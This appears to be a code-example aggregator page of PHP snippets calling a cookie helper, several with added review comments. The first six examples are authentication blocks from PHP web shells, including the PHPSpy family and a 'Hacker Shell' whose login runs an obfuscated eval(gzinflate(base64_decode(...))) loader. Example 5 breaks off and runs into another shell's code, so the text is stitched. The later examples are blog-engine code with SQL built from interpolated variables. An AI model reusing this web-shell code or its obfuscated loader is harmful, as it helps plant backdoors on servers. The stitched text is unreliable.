Пример #1
// Send a Content-Type header for the configured charset. This chain handles
// only 'utf8' and 'latin1'; any other value sends no header here.
if ($charset == 'utf8') {
    header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'latin1') {
    header("content-Type: text/html; charset=iso-8859-1");
}
// Logout: overwrite the 'godssid' cookie with an empty value and a negative
// third argument (scookie() is defined elsewhere; presumably a lifetime offset
// that expires the cookie — confirm), then send the client back to $self and stop.
if ($haz == "logout") {
    scookie('godssid', '', -86400 * 365);
    // NOTE(review): $self is concatenated into HTML without escaping; where it
    // is assigned is not visible in this excerpt.
    p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
    p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
    exit;
}
// Single-password gate, enforced only when $admin['check'] is truthy.
// NOTE(review): a lone shared password whose hash is also the cookie value is a
// pattern commonly seen in PHP web shells; if this file turns up unexpectedly on
// a server, treat it as suspect and review the rest of the script.
if ($admin['check']) {
    // The submitted password is reduced to an unsalted MD5 digest before comparison.
    $password = md5($password);
    if ($doing == 'login') {
        // Loose (==) comparison of the digest with the stored value.
        if ($admin['pass'] == $password) {
            // The cookie value is the digest itself, so the stored hash doubles
            // as the session credential. For log hunting: a 'godssid' cookie
            // carrying 32 hex characters is a usable indicator.
            scookie('godssid', $password);
            p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
            p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
            exit;
        }
    }
    // Every other request: the cookie must be present (truthy) and equal to
    // $admin['pass'], otherwise loginpage() is called. loginpage() is defined
    // elsewhere; presumably it renders the form and terminates — confirm.
    if ($_COOKIE['godssid']) {
        if ($_COOKIE['godssid'] != $admin['pass']) {
            loginpage();
        }
    } else {
        loginpage();
    }
}
// Start with an empty error message.
$errmsg = '';
if ($haz == 'phpinfo') {
Пример #2
} elseif ($charset == 'eucjpms') {
    header("content-Type: text/html; charset=euc-jp");
}
// URL of the running script: PHP_SELF when set, otherwise SCRIPT_NAME.
// NOTE(review): PHP_SELF can include client-supplied path info, and $self is
// written into HTML below without escaping; htmlspecialchars() would be needed
// for it to be safe in that context.
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== Authentication =====================*/
// Logout: overwrite the 'loginpass' cookie with an empty value and a negative
// third argument (scookie() is defined elsewhere; presumably a lifetime offset
// that expires it — confirm), then refresh to $self and stop.
if ($action == "logout") {
    scookie('loginpass', '', -86400 * 365);
    p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
    p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
    exit;
}
// Single-password gate, enforced only when $admin['check'] is truthy.
// NOTE(review): same login shape as the 'phpspypass' and 'kyobin' excerpts on
// this page; a file containing it that nobody deployed deliberately should be
// treated as a suspected web shell.
if ($admin['check']) {
    if ($doing == 'login') {
        // Unsalted MD5 of the submitted password, compared loosely (==) with the stored value.
        if ($admin['pass'] == md5($password)) {
            // The cookie holds the digest itself, i.e. the same value as
            // $admin['pass']; a 32-hex 'loginpass' cookie is a log indicator.
            scookie('loginpass', md5($password));
            p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
            p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
            exit;
        }
    }
    // All other requests need a truthy 'loginpass' cookie equal to $admin['pass'];
    // otherwise loginpage() (defined elsewhere) is called.
    if ($_COOKIE['loginpass']) {
        if ($_COOKIE['loginpass'] != $admin['pass']) {
            loginpage();
        }
    } else {
        loginpage();
    }
}
/*===================== End of authentication =====================*/
$errmsg = '';
Пример #3
    header("content-Type: text/html; charset=euc-kr");
} elseif ($charset == 'euc-jp') {
    header("content-Type: text/html; charset=euc-jp");
}
// URL of the running script: PHP_SELF when set, otherwise SCRIPT_NAME.
// NOTE(review): PHP_SELF can include client-supplied path info; here it is
// only used in Location headers.
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== Authentication =====================*/
// Logout: overwrite the 'loginpass' cookie (empty value, negative third
// argument; scookie() is defined elsewhere), redirect to $self and stop.
// The @ hides any warning from header(), e.g. when output was already sent.
if ($action == "logout") {
    scookie('loginpass', '', -86400 * 365);
    @header('Location: ' . $self);
    exit;
}
// Single-password gate, enforced only when $pass is truthy.
// NOTE(review): same login shape as the 'phpspypass' and 'kyobin' excerpts on
// this page; treat an unexpected file containing it as a suspected web shell.
if ($pass) {
    if ($action == 'login') {
        // encode_pass() is defined elsewhere; its algorithm is not visible here.
        // The comparison is loose (==).
        if ($pass == encode_pass($password)) {
            // The cookie receives the same encoded value that $pass holds.
            scookie('loginpass', encode_pass($password));
            @header('Location: ' . $self);
            exit;
        }
    }
    // All other requests need a truthy 'loginpass' cookie equal to $pass;
    // otherwise loginpage() (defined elsewhere) is called.
    if ($_COOKIE['loginpass']) {
        if ($_COOKIE['loginpass'] != $pass) {
            loginpage();
        }
    } else {
        loginpage();
    }
}
/*===================== End of authentication =====================*/
$errmsg = '';
// Default to the 'file' action when none was supplied.
!$action && ($action = 'file');
Пример #4
} elseif ($charset == 'latin1') {
    header("content-Type: text/html; charset=iso-8859-2");
}
// URL of the running script: PHP_SELF when set, otherwise SCRIPT_NAME.
// NOTE(review): PHP_SELF can include client-supplied path info, and $self is
// written into HTML below without escaping.
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== Authentication =====================*/
// Logout: overwrite the 'phpspypass' cookie (empty value, negative third
// argument; scookie() is defined elsewhere), refresh to $self and stop.
if ($action == "logout") {
    scookie('phpspypass', '', -86400 * 365);
    p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
    p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
    exit;
}
// Single-password gate, enforced only when $admin['check'] is truthy.
// NOTE(review): the 'phpspypass' cookie name points at the PHPSpy web-shell
// family; presence of that cookie in web or proxy logs is worth hunting for.
if ($admin['check']) {
    if ($doing == 'login') {
        // No hashing is visible in this excerpt: $password is compared as-is
        // (loosely, ==) unless it was transformed earlier, outside this view.
        if ($admin['pass'] == $password) {
            // The cookie stores the same value that was just compared.
            scookie('phpspypass', $password);
            p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
            p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
            exit;
        }
    }
    // All other requests need a truthy 'phpspypass' cookie equal to
    // $admin['pass']; otherwise loginpage() (defined elsewhere) is called.
    if ($_COOKIE['phpspypass']) {
        if ($_COOKIE['phpspypass'] != $admin['pass']) {
            loginpage();
        }
    } else {
        loginpage();
    }
}
/*===================== End of authentication =====================*/
$errmsg = '';
Пример #5
    header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
    header("content-Type: text/html; charset=iso-8859-2");
}
// URL of the running script: PHP_SELF when set, otherwise SCRIPT_NAME.
// NOTE(review): PHP_SELF can include client-supplied path info, and $self is
// written into HTML below without escaping.
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
// Logout: overwrite the 'kyobin' cookie (empty value, negative third argument;
// scookie() is defined elsewhere), emit an immediate meta refresh to $self and stop.
// NOTE(review): the 'kyobin' cookie name is a usable log indicator for this script.
if ($action == "logout") {
    scookie('kyobin', '', -86400 * 365);
    p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
    p('<body background=black>');
    exit;
}
if ($admin['check']) {
    if ($doing == 'login') {
        if ($admin['pass'] == $password) {
            scookie('kyobin', $password);
            //Passwd Bypass Read
            eval(gzinflate(base64_decode('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')));
            p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
            p('<body bgcolor=black>
<BR><BR><div align=center><font color=yellow face=tahoma size=2>Hacker Shell - Yukleniyor..<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
            exit;
        } else {
            $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
            echo $err_mess;
        }
    }
    if ($_COOKIE['kyobin']) {
        if ($_COOKIE['kyobin'] != $admin['pass']) {
            loginpage();
        }
    ${'p' . $i} = isset($P['p' . $i]) ? $P['p' . $i] : '';
}
// Send a Content-Type header only when $charset is a key of $charsetdb, so the
// value concatenated into the header is limited to that table's keys.
if (isset($charsetdb[$charset])) {
    header("content-Type: text/html; charset=" . $charset);
}
$timestamp = time();
/* Authentication */
// Logout: overwrite the 'loginpass' cookie (empty value, negative third
// argument; scookie() is defined elsewhere), redirect to SELF and stop.
// The @ hides any warning from header().
if ($act == "logout") {
    scookie('loginpass', '', -86400 * 365);
    @header('Location: ' . SELF);
    exit;
}
// Single-password gate, enforced only when $pass is truthy.
// NOTE(review): same login shape as the 'phpspypass' and 'kyobin' excerpts on
// this page; treat an unexpected file containing it as a suspected web shell.
if ($pass) {
    if ($act == 'login') {
        // encode_pass() is defined elsewhere; its algorithm is not visible here.
        // $P is filled outside this excerpt. The comparison is loose (==).
        if ($pass == encode_pass($P['password'])) {
            // The cookie receives the same encoded value that $pass holds.
            scookie('loginpass', encode_pass($P['password']));
            @header('Location: ' . SELF);
            exit;
        }
    }
    // All other requests need a 'loginpass' cookie equal to $pass; otherwise
    // loginpage() (defined elsewhere) is called.
    if (isset($_COOKIE['loginpass'])) {
        if ($_COOKIE['loginpass'] != $pass) {
            loginpage();
        }
    } else {
        loginpage();
    }
}
/* End of authentication */
$errmsg = '';
// HTML numeric entity for an up-pointing triangle.
$uchar = '&#9650;';
Пример #7
         $article['allowread'] = 0;
     } else {
         $article['allowread'] = 1;
         if ($article['attachments']) {
             $haveattach = 1;
         }
         if ($article['description']) {
             $article['content'] = $article['description'];
         }
     }
     $articledb[$article['articleid']] = $article;
 }
 // Drop the loop variable and release the result set of the preceding query.
 unset($article);
 $DB->free_result($query);
 // Set a timestamp cookie that is only considered valid for a limited time;
 // used for cookie-based anti-hotlinking.
 // NOTE(review): the value is a plain timestamp the client can read and alter;
 // how (and whether) it is validated is not visible in this excerpt.
 scookie('viewarticle', $timestamp);
 // Per-article metadata (categories and tags), filled by the query that follows.
 $metadb = array();
 if ($aids) {
     $query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\t\t\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\t\t\tWHERE m.type IN ('category', 'tag') AND r.cid IN ({$aids})\r\n\t\t\tORDER BY m.displayorder ASC, m.mid DESC");
     while ($meta = $DB->fetch_array($query)) {
         if ($meta['type'] == 'tag') {
             $meta['url'] = gettaglink($meta['slug']);
             $articledb[$meta['cid']]['content'] = highlight_tag($articledb[$meta['cid']]['content'], $meta['name']);
         } else {
             $meta['url'] = getcatelink($meta['mid'], $meta['slug']);
         }
         $metadb[$meta['cid']][$meta['type']][] = $meta;
     }
     unset($meta);
     $DB->free_result($query);
     if ($haveattach) {
Пример #8
    }
    $username = char_cv($username);
    $r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE username='******' LIMIT 1");
    if ($r['userid']) {
        redirect('该用户名已被注册.');
    }
    $email = char_cv($email);
    $r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE email='{$email}' LIMIT 1");
    if ($r['userid']) {
        redirect('该E-mail已被注册.');
    }
    $password = md5($password);
    $DB->query("INSERT INTO {$db_prefix}users (username, password, logincount, loginip, logintime, email, url, regdateline, regip, groupid, lastip, lastvisit, lastactivity) VALUES ('{$username}', '{$password}', '1', '{$onlineip}', '{$timestamp}', '{$email}', '{$url}', '{$timestamp}', '{$onlineip}', '3', '{$onlineip}', '{$timestamp}', '{$timestamp}')");
    $sax_uid = $DB->insert_id();
    //保存COOKIE
    scookie('sax_auth', authcode("{$sax_uid}\t{$password}\t1"), $login_life);
    //更新数据库中的登陆会话
    updatesession();
    redirect('注册成功.', $options['url']);
}
//登陆状态检测
if (!$sax_uid || !$sax_pw || !$sax_logincount) {
    loginpage();
} else {
    $r = $DB->fetch_one_array("SELECT userid, password, logincount FROM {$db_prefix}users WHERE userid='{$sax_uid}'");
    if (!$r) {
        loginpage();
    }
    if ($sax_pw != $r['password']) {
        loginpage();
    }
Пример #9
     message('该评论已存在');
 }
 // Store the new comment.
 // NOTE(review): every value is interpolated straight into the SQL text. Whether
 // $username, $email, $url, $content and the rest were escaped earlier is not
 // visible in this excerpt — confirm, and prefer bound parameters if the $DB
 // wrapper supports them.
 $DB->query("INSERT INTO {$db_prefix}comments (comment_parent, articleid, author, email, url, dateline, content, ipaddress, visible) VALUES ('{$comment_parent}', '{$articleid}', '{$username}', '{$email}', '{$url}', '{$timestamp}', '{$content}', '{$onlineip}', '{$visible}')");
 $cmid = $DB->insert_id();
 if ($sax_uid) {
     $DB->unbuffered_query("UPDATE {$db_prefix}users SET lastpost='{$timestamp}' WHERE userid='{$sax_uid}'");
     // Update the user's last-post time.
 }
 if (!$spam) {
     // Not spam: bump the article's comment count and the global counter,
     // then rebuild the related caches.
     $DB->unbuffered_query("UPDATE {$db_prefix}articles SET comments=comments+1 WHERE articleid='{$articleid}'");
     $DB->unbuffered_query("UPDATE {$db_prefix}statistics SET comment_count=comment_count+1");
     newcomments_recache();
     statistics_recache();
 }
 // Remember when this client last posted.
 // NOTE(review): the value lives in a client-side cookie; if it is the only
 // input to a posting-interval check, that check is advisory — confirm
 // against the code that reads it.
 scookie('comment_post_time', $timestamp);
 // Jump to the newly posted comment: for a reply, get_comment_parent()
 // (defined elsewhere) supplies the comment id to anchor on.
 if ($comment_parent) {
     $gocommentid = get_comment_parent($comment_parent);
 } else {
     $gocommentid = $cmid;
 }
 // URL fragment of the target comment.
 $cmnum = '#cm' . $gocommentid;
 // Comments per page, cast to int; 0 skips the paging computation that follows.
 $article_comment_num = (int) $options['article_comment_num'];
 if ($article_comment_num) {
     $cpost = $DB->result($DB->query("SELECT COUNT(commentid) FROM {$db_prefix}comments WHERE articleid='{$articleid}' AND visible='1' AND commentid<='{$gocommentid}' AND comment_parent='0'"), 0);
     if ($cpost / $article_comment_num <= 1) {
         $page = 1;
     } else {
         $page = @ceil($cpost / $article_comment_num);
         $article['url'] = redirect_permalink($articleid, $article['alias'], $page);
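/**
 * Expire one cookie, one array-style cookie group, or every cookie the client sent.
 *
 * With a non-empty $key only that cookie is expired. When PHP parsed it as an
 * array (the browser holds separate cookies named "name[index]"), each element
 * is expired under its own "name[index]" name. With an empty $key every entry
 * of $_COOKIE is expired the same way and the cached login globals are reset.
 *
 * Expiry is delegated to scookie() (defined elsewhere) with an empty value and
 * a negative third argument — presumably a lifetime offset; confirm against scookie().
 *
 * @param string $key Cookie name to clear, or '' to clear everything.
 * @return void
 */
function dcookies($key = '')
{
    global $sax_uid, $sax_user, $sax_pw;
    $expired = -86400 * 365;
    if ($key) {
        // isset() avoids an undefined-index notice when the cookie was never sent.
        $current = isset($_COOKIE[$key]) ? $_COOKIE[$key] : null;
        if (is_array($current)) {
            foreach ($current as $index => $unused) {
                scookie($key . '[' . $index . ']', '', $expired);
            }
        } else {
            scookie($key, '', $expired);
        }
    } else {
        if (is_array($_COOKIE)) {
            foreach ($_COOKIE as $name => $value) {
                if (is_array($value)) {
                    // Array-style cookies exist in the browser as "name[index]";
                    // expiring the bare "name" would leave them in place after a
                    // full clear, so expire each element by its real name.
                    foreach ($value as $index => $unused) {
                        scookie($name . '[' . $index . ']', '', $expired);
                    }
                } else {
                    scookie($name, '', $expired);
                }
            }
        }
        // Forget the login state cached in globals for the rest of this request.
        $sax_uid = 0;
        $sax_user = $sax_pw = '';
    }
}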
Пример #11
">
<title>Refresh Limitation Enabled</title>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px">
  <p><strong>Refresh Limitation Enabled</strong></p>
  <p>The time between your two requests is smaller than 2 seconds, please do NOT refresh and wait for automatical forwarding ...</p>
</div>
</center>
</body>
</html>
<?php 
        exit;
    }
    scookie('lastrequest', $timestamp . "\t" . $REQUEST_URI);
}
if (($attackevasive == 2 || $attackevasive == 3) && ($_SERVER['HTTP_X_FORWARDED_FOR'] || $_SERVER['HTTP_VIA'] || $_SERVER['HTTP_PROXY_CONNECTION'] || $_SERVER['HTTP_USER_AGENT_VIA'])) {
    ?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Proxy Connection Denied</title>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px">
  <p><strong>Proxy Connection Denied</strong></p>
  <p>Your request was forbidden due to the administrator has set to deny all proxy connection.</p>
</div>
</center>
Пример #12
// Load the categories and tags attached to this article.
// NOTE(review): $article['articleid'] is concatenated into the SQL text; it
// presumably comes from a database row, but that is not visible here — confirm.
$query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\tWHERE m.type IN ('category', 'tag') AND r.cid='" . $article['articleid'] . "'\r\n\tORDER BY m.displayorder ASC, m.mid DESC");
// Build a comma-separated keyword list from the names of the returned rows.
$article['keywords'] = $comma = '';
while ($meta = $DB->fetch_array($query)) {
    if ($meta['type'] == 'tag') {
        // Tags get a tag link and are highlighted inside the article body.
        $meta['url'] = gettaglink($meta['slug']);
        $article['content'] = highlight_tag($article['content'], $meta['name']);
    } else {
        $meta['url'] = getcatelink($meta['mid'], $meta['slug']);
    }
    $article['keywords'] .= $comma . $meta['name'];
    $metadb[$article['articleid']][$meta['type']][] = $meta;
    $comma = ',';
}
$DB->free_result($query);
// When the submitted read password matches the article's, remember it in a
// per-article cookie so later views can skip the prompt.
// NOTE(review): the comparison is loose (==), and the cookie value is the
// password itself after sax_addslashes(); a derived token (e.g. a keyed hash)
// would avoid keeping the secret on the client. scookie()'s cookie flags are
// not visible in this excerpt.
if ($_POST['readpassword'] && $article['readpassword'] == sax_addslashes($_POST['readpassword'])) {
    scookie('readpassword_' . $article['articleid'], sax_addslashes($_POST['readpassword']), 2592000);
    // One month (2592000 seconds = 30 days).
}
//设置文章的分类名、作者、TAG、标题成为meta\title信息
if (!$article['keywords']) {
    $tmp = $comma = '';
    if (is_array($catecache) && count($catecache)) {
        foreach ($catecache as $data) {
            $tmp .= $comma . $data['name'];
            $comma = ',';
        }
        $options['meta_keywords'] = $tmp;
    } else {
        $options['meta_keywords'] = '';
    }
} else {
Пример #13
// 本文件说明:前台主程序
// --------------------------------------------------------------//
// 本程序作者:angel
// --------------------------------------------------------------//
// 本程序版本:SaBlog-X Ver 2.0
// --------------------------------------------------------------//
// 本程序主页:http://www.sablog.net
// ==============================================================//
require_once 'global.php';
//require_once(SABLOG_ROOT.'include/query.inc.php');
// Default to the 'article' module when no action was supplied.
!$action && ($action = 'article');
// Clear the record of viewed articles.
// NOTE(review): this reads $_GET['action'] directly and changes client state on
// a GET request. The cookies are overwritten with an empty value and no lifetime
// argument, unlike the other cookie-clearing calls on this page that pass a
// negative offset; whether that deletes them depends on scookie() — confirm.
if ($_GET['action'] == 'clearalready') {
    if (is_array($_COOKIE['articleids'])) {
        foreach ($_COOKIE['articleids'] as $key => $value) {
            scookie("articleids[" . $key . "]", '');
        }
    }
    // $referer is set outside this excerpt; presumably the page to return to.
    message('已经删除浏览过的文章记录', $referer);
}
// Fall back to page 1 when the requested page exceeds a non-zero $maxpages.
$page = $maxpages && $page > $maxpages ? 1 : $page;
// Names of the front-end modules; the in_array() check that follows uses this
// list to decide whether $action may be passed to loadmodule().
$moduledb = array('article', 'show', 'tagslist', 'archives', 'links');
if (in_array($action, $moduledb)) {
    $archivenum = count($archivecache);
    //前台显示12个归档就可以了.显示那么多干嘛?
    if ($archivenum > 12) {
        $archivecache = array_slice($archivecache, 0, 12);
    }
    $module = loadmodule($action);
} else {
    message('未知模块');